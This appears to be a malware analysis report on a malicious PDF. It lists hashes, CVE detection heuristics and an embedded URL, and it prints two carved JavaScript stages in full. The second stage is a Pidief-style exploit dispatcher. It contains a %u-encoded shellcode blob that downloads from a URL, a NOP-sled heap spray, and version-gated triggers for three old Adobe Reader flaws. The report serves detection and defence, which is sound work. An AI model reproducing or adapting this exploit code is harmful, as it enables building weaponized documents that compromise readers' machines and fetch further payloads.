Malicious PDF — malware analysis report

Static analysis result for SHA-256 1f4e961a2aa371d5…

MALICIOUS

PDF

5.1 KB Authoring application: Qevxigibepeci (via 51726Fepogaxadagona) First seen: 2026-05-10
MD5: 47071f92eb7521869bc6dc1b29372234 SHA-1: 291c7e5e6de462317da6e7a1780d63cc5ac6a7fc SHA-256: 1f4e961a2aa371d5933bb0a0aa5c144605a7f52f4b52a0e1d9240a7c63b7e388
350 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ahrudg.egh/4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0010_000.js pdf-javascript-stream PDF /JS object 10 at offset 0xEBD 860 bytes
SHA-256: f4e1ba9115394d32abd591aa1bf17dcaa4ab2fd461b1159ab9428761cdf22f07
Preview script
First 1,000 lines of the extracted script
// Stage-1 loader carved from PDF /JS object 10. It is a thin obfuscated
// wrapper: every meaningful name is built by string concatenation, and the
// real script is hidden in `oLM` with junk '4' characters interleaved.
// The payload itself is not in this object — it is reassembled from the
// PDF's own page text (see `oLM` below). Empty constructor; all state lives
// on the prototype.
function oL(){}

oL.prototype = {

// "evalouE".substr(0,4) === "eval": the name of the app method used as the sink.
zK : "evalouE".substr(0,4),
// Stage-2 source with the digit '4' sprinkled in as noise; the trailing
// .replace(/[4]/g, '') strips it before execution. Read with the noise
// removed, the string does the following:
//  - builds method names by concatenation: getPageNthWord, getPageNumWords,
//    pageNum, String.fromCharCode, parseInt, eval, join, substr, length;
//  - concatenates every word on the current page (`pW` is the document object
//    stored in `pO`; `pW.pageNum` selects the page) into one string;
//  - consumes that string two hex digits at a time, parseInt(.., 16) XOR 53,
//    and collects the resulting characters;
//  - hands the result to app[eval], then nulls the buffer.
// Detection value: eval reached through a computed property, /[4]/g
// junk-stripping, and page-word reads (getPageNthWord/getPageNumWords) are
// the indicators; the decoded stage lives in the page text, not in this object.
oLM : 'var4 c4H =44 53 4;va44r p44W=this.pO44;oR=\'ge\'+\'tPageN\'+\'t4hW\'+\'44ord\';l4AL=44\'g4e44tPag4\'+\'44eN4u44mWor4\'+\'d4s\';hC=\'fr\'+\'o44m44\'+\'Ch\'+\'4a44r44C\'+\'ode\';iL=\'pag4eN\'+\'u4m44\';pWF=\'sub\'+4\'str\';bQN=\'e\'+\'v4\'+4\'a4\'+\'l\';zM=\'len\'4+\'gth\';iZ=\'jo44\'+\'44in\';pE=16;4e44HO=p4W[lAL44]44(44pW[i4L])44;mN=\'\';44eHK=\'44pa4r\'+44\'seI4\'+\'nt\';oP=\'d\'+\'o4c\';for(44var hY=04;hY< eHO; 4hY++){4mN=44[mN44,pW[oR](pW[iL],44hY4,true)]44[iZ](\'4\');;}var aT=\'\';44fo4r(v44ar hY=0;hY < mN[zM4]; hY+=2){aDY44=44mN[pW44F44](4hY,2);xK=String[h44C](pW[eHK44](4aDY,pE)^cH);aT=[a44T,xK].join4(\'\');}ap4p44[bQN](a44T);aT=nu4l44l;4'.replace(/[4]/g, ''),
// The Acrobat `app` object; indexed with `zK` in tQ() below.
cF : app,

// Entry point: resolves app["eval"] and evaluates the de-noised stage-2 source.
tQ : function(){

var uV=this.cF[this.zK];
uV(this.oLM);
}
}

// Implicit global (no var). The document object (`this` at document level) is
// attached as `pO` so the stage-2 script can read page words from it, then the
// loader fires.
pAF = new oL();

pAF.pO=this;
pAF.tQ();
legacy_pdfkit_stage_000.js deobfuscated-js getPageWords-XOR Pidief stage normalized at offset 0x0 3967 bytes
SHA-256: 97f2fcc30408e766e61299980c3ae1a64fb06ceff7faab1a0b117039ae362066
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Stage-2 Pidief exploit dispatcher as recovered by the analyzer (one minified
// line). The "return" / "pI;" split at the end of the first line is most
// likely a preview wrap — in a real engine ASI would make qX() return
// undefined — so treat this listing as display-normalized, not runnable.
// What the visible code does:
//  - rS: true only when the PDF's Producer starts with "debug"; gates the
//    app.alert diagnostics throughout (an authoring switch; a sample whose
//    Producer starts with "debug" is itself worth a detection note).
//  - uF(): turns "%uXXXX"-delimited hex into a character string.
//  - qX()/yX(): map each character of Author+Title through the Info entry 'p'
//    as a lookup key into the oJ alphabet (note yX's 2nd/3rd parameters are
//    swapped relative to the call); eV() appends "?reader_version=<viewerVersion>"
//    (network IoC: a PDF-originated request carrying a reader_version parameter)
//    and prepends a fixed %u-encoded blob before decoding with uF().
//  - oD()/bG(): fill the global array sZ with repeated pad+payload strings;
//    the report's heuristics describe this as the heap-spray step.
//  - mR(): app.viewerVersion as a string, or 0 when unavailable.
//  - mN(): version-gated dispatch — 9.2 → media.newPlayer (CVE-2009-4324 per
//    the report), >8 → util.printf("%45000f", ...) (CVE-2008-2992), <8 →
//    Collab.collectEmailInfo, <9.1 → Collab.getIcon (CVE-2009-0927). These
//    API names, the "%45000f" width and the 0x0c0c0c0c / 0x30303030 constants
//    are the static indicators to key on.
// The trailing `b=...; eT=...; yR=[];` assignments are unused noise.
var pU="pU";var l='';var oJ='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#';n=["d"];lC=18613;lC--;try {var h='kV'.substring(2824,2824)} catch(h){};try {var aD='hU'.substring(3556,3556)} catch(aD){};var rW=this.pO.info['p'].replace(/[\s]/g, '');this.yF='';x={rC:20358};try {var oZ='v'} catch(oZ){};try {var gZ='fO'.substr(28224)} catch(gZ){};var iDM = this.pO;var gV = iDM.info;var rS = (gV.producer.substr(0,5) == 'debug');var sZ = new Array(); var vE = "%u";function uF(str){str = str.split(vE);var ret="";for(var i in str){if(str[i] != "")ret += String.fromCharCode(parseInt(str[i],16));}return ret;}function lA(str1, str2){return [str1, str2].join("");}function eV(dO){var uTI = qX();var pS = mR();uTI += ((uTI.indexOf("?") > -1) ? "&" : "?") + "reader_version=" + pS;if(rS) app.alert("URL: " + uTI);uTI=bS(uTI);var d=vE;var aDY=d+"C033"+d+"8B64"+d+"3040"+d+"0C78"+d+"408B"+d+"8B0C"+d+"1C70"+d+"8BAD"+d+"0858"+d+"09EB"+d+"408B"+d+"8D34"+d+"7C40"+d+"588B"+d+"6A3C"+d+"5A44"+d+"E2D1"+d+"E22B"+d+"EC8B"+d+"4FEB"+d+"525A"+d+"EA83"+d+"8956"+d+"0455"+d+"5756"+d+"738B"+d+"8B3C"+d+"3374"+d+"0378"+d+"56F3"+d+"768B"+d+"0320"+d+"33F3"+d+"49C9"+d+"4150"+d+"33AD"+d+"36FF"+d+"BE0F"+d+"0314"+d+"F238"+d+"0874"+d+"CFC1"+d+"030D"+d+"40FA"+d+"EFEB"+d+"3B58"+d+"75F8"+d+"5EE5"+d+"468B"+d+"0324"+d+"66C3"+d+"0C8B"+d+"8B48"+d+"1C56"+d+"D303"+d+"048B"+d+"038A"+d+"5FC3"+d+"505E"+d+"8DC3"+d+"087D"+d+"5257"+d+"33B8"+d+"8ACA"+d+"E85B"+d+"FFA2"+d+"FFFF"+d+"C032"+d+"F78B"+d+"AEF2"+d+"B84F"+d+"2E65"+d+"7865"+d+"66AB"+d+"6698"+d+"B0AB"+d+"8A6C"+d+"98E0"+d+"6850"+d+"6E6F"+d+"642E"+d+"7568"+d+"6C72"+d+"546D"+d+"8EB8"+d+"0E4E"+d+"FFEC"+d+"0455"+d+"5093"+d+"C033"+d+"5050"+d+"8B56"+d+"0455"+d+"C283"+d+"837F"+d+"31C2"+d+"5052"+d+"36B8"+d+"2F1A"+d+"FF70"+d+"0455"+d+"335B"+d+"57FF"+d+"B856"+d+"FE98"+d+"0E8A"+d+"55FF"+d+"5704"+d+"EFB8"+d+"E0CE"+d+"FF60"+d+"0455";aDY+=uTI;return uF(aDY);};function qX(){var gN = (gV.author + gV.title).replace(/[\s]/g, '');var pI = yX(gN, rW, oJ);return 
pI;};function yX(gN, oJ, rW){var pI="";for(var i=0; i < gN.length; i++){var xE = oJ.indexOf(gN[i]);if(xE > -1 ){pI += rW[xE];}}return pI;};function bS(gN){var out = "";gN = eH(gN);g = Math.round(gN.length / 4);if (g != gN.length /4) gN+="00";for(var i=0; i < gN.length; i+=4){out+= vE + gN.substr(i+2, 2) + gN.substr(i, 2);}return out;};function eH(s){var i, f = 0, a = [];s += '';f = s.length;for (i = 0; i<f; i++) {a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();}return a.join('');};function bG(kVM, len){while (kVM.length * 2 < len){kVM = lA(kVM, kVM);}return kVM.substring(0, len / 2);};function oD(bQ){var wX = 0x0c0c0c0c;        tI = eV("pdf");if (bQ == 1){wX = 0x30303030;}var uX = 0x400000;var ln = tI.length * 2;var xI = uX - (ln + 0x38);var kVM = uF(vE+"9090"+vE+"9090"); kVM = bG(kVM, xI);var mDC = (wX - 0x400000) / uX;for (var mH = 0; mH < mDC; mH ++ ){sZ[mH] = lA(kVM, tI);}};function mR(){try {return app.viewerVersion.toString();}catch(lM){    return 0;}}function mN(){if(rS) app.alert("called exploit");var pS = mR();if(rS)  app.alert("v: " + pS);if (pS == 9.2){if(rS) app.alert("media.newPlayer");oD(1);var sf="1.000000000.000000000.1337 : 3.13.37";util.printd(sf, new Date());try {media.newPlayer(null);} catch(e) {if(rS) app.alert("media.newPlayer exception: " + e);}util.printd(sf, new Date());}if (pS > 8){if(rS) app.alert("util.printf : " + util.printf);oD(1);var pG = "12999999999999999999";for (gNW=0; gNW < 276; gNW++) pG += "8";util.printf("%45000f", pG);return;}if (pS < 8){if(rS) app.alert("Collab.collectEmailInfo");oD(0);var aDA = uF(vE+"0c0c"+vE+"0c0c");while (aDA.length < 44952) aDA += aDA;var oo={ subj : "", msg : aDA};iDM.collabStore = iDM.Collab.collectEmailInfo(oo); return;}if (pS < 9.1){if (iDM.Collab.getIcon){if(rS) app.alert("Collab.getIcon");oD(0);var sF = unescape("%09");while (sF.length < 0x4000) sF += sF;sF = "N." + sF;iDM.Collab.getIcon(sF);}return;}}mN();b={zA:false};var eT=["pM"];var yR=[];